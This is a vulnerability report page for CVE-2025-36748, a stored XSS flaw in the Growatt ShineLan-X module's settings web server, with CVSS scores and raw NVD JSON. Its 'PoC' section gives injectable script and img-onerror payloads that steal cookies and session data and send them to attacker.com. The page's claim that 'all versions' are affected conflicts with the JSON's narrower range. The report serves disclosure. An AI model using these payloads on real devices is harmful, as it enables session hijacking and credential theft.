Security Vulnerability Report
CVE-2025-36748 CVSS 5.4 MEDIUM

Published: 2025-12-13 16:16:54
Last Modified: 2026-01-14 18:05:13

Description

ShineLan-X contains a stored cross-site scripting (XSS) vulnerability in the local configuration web server. A JavaScript code snippet can be inserted in the communication module’s settings center. This may allow attackers to force a legitimate user’s browser’s JavaScript engine to run malicious code.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:* - NOT VULNERABLE
All versions of the ShineLan-X communication module settings center

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-36748 PoC: Stored XSS in ShineLan-X Communication Module -->
<!-- Login to ShineLan-X with low-privilege account, navigate to communication module settings -->
<!-- Inject the following payload in any configuration field -->
<script>
// Steal user cookies and send to attacker server
var stolen_data = {
    cookies: document.cookie,
    url: window.location.href,
    userAgent: navigator.userAgent
};
fetch('https://attacker.com/collect?data=' + btoa(JSON.stringify(stolen_data)), {
    method: 'GET',
    mode: 'no-cors'
});
</script>
<!-- Alternative payload for session hijacking -->
<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">
<!-- After injection, any user viewing the affected page will execute the script -->

References

https://csirt.divd.nl/CVE-2025-36748/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36748", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.850", "lastModified": "2026-01-14T18:05:12.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShineLan-X contains a stored cross site scripting (XSS) vulnerability in the local configuration web server. The JavaScript code snippet can be inserted in the communication module’s settings center. This may allow attackers to force a legitimate user’s browser’s JavaScript engine to run malicious code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:L/SC:H/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0.0", "versionEndExcluding": "3.6.0.2", "matchCriteriaId": "1176EDB4-C08F-4592-8C16-321A8A0539C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD537AAA-F836-496A-BC05-6CAED38FB271"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36748/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}